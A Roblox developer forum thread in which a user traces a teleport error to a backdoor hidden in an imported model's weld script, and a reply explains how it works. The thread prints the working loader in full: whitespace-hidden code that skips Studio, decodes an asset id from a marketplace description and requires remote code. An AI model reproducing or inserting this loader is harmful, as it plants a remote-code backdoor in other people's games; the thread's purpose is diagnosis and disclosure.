Error Code 770; teleport to a place that does not exist

I just wanted to ask a question, and I’m not going to post any code due to the fact that it’s hundreds of lines long.

When in Studio, I do not get any error, but when I publish my game, the error code pops up as soon as I enter the game. I am NOT using Teleportation service, so why is this error popping up?

the total error is:
“Teleport exception: HTTP 400 (Bad Request)
Teleport web
exception: {“jobId” :null, “status” :4, “joinScriptUrl” :null, “authentication” :null, “authenticationTicket” :null, “message” (etc.)
raiseTeleportInitFailedFailedEvent: Teleport failed because Game’s root place is not active. (GameNotFound)”

1 Like

You might have a backdoor script somewhere. Additionally it might just be roblox’s HTTP service down. Since many users are reporting this kind of bug.

3 Likes

Backdoor script meaning one that is hidden somewhere in the explorer?

1 Like

Possibly. Are you using any plugins/free models? (also to reply to a specific post, click the reply button directly)

2 Likes

Hmm, All my plugins were installed before the error decided to pop up. The weird thing is that no error appears when editing on studio online, only when I publish the game and play it directly from there does this message appear. it’s super weird…

Can you find out what place it is trying to teleport to? Something like in this post?

1 Like

Found the problem:

this was hidden inside of a part from a model I Imported:

local function weld()																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																		end if not game:service'RunService':IsStudio()then local a,b='',{Q=0,L=1,G=2,R=3,B=4,M=5,N=6,C=7,X=8,Z=9}local function c(d)local e=''for f in d:gmatch('%a')do e=e..b[f]end return tonumber(e)end repeat pcall(function()local z=game:service'MarketplaceService':GetProductInfo(4436111876).Description if z~=a then pcall(require,c(z:sub(52)))a=z end end)wait(5)until nil end function weld()																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																									
	local parts,last = {}, nil
	local function scan(parent)
		for _,v in pairs(parent:GetChildren()) do
			if (v:IsA("BasePart")) then
				if (last) then
					local w = Instance.new("Weld")
					w.Name = ("%s_Weld"):format(v.Name)
					w.Part0,w.Part1 = last,v
					w.C0 = last.CFrame:inverse()
					w.C1 = v.CFrame:inverse()
					w.Parent = last
				end
				last = v
				table.insert(parts,v)
			end
			scan(v)
		end
	end
	scan(script.Parent)
	for _,v in pairs(parts) do
		v.Anchored = false
	end
end
1 Like

This doesn’t look like it would cause the issue.

I dont know, I removed it and it did ¯_(ツ)_/¯

1 Like

It’s probably not that script which caused it from the looks of it, is that the whole code? Is there anything else in the model?

I only deleted the script, problem disappeared… I have no Idea why, which obviously makes me even more curious…

Sorry to bump, but I felt like explaining.

@Lukeacrey is right, that script is causing the problem.

end if not game:service'RunService':IsStudio()then local a,b='',{Q=0,L=1,G=2,R=3,B=4,M=5,N=6,C=7,X=8,Z=9}local function c(d)local e=''for f in d:gmatch('%a')do e=e..b[f]end return tonumber(e)end repeat pcall(function()local z=game:service'MarketplaceService':GetProductInfo(4436111876).Description if z~=a then pcall(require,c(z:sub(52)))a=z end end)wait(5)until nil end function weld()

This is malicious code that was hidden on line 1 of that ‘weld’ script, pushed far to the right with lots of indents. It uses MarketPlaceService to get the description of an item, which returns some kind of code. It looks like the description is then decoded into a module id and ‘require’ is called on it. The module being required is likely what is causing the teleporting, since there is no reference to TeleportService in the code that we can see.

It also uses RunService to avoid running in studio, making it harder to notice.
Aside from the huge horizontal width of the script, what also gave it away for me was the lack of any actual function call in the ‘disguise’ code. The ‘weld’ function appears to be declared, but is never run.

3 Likes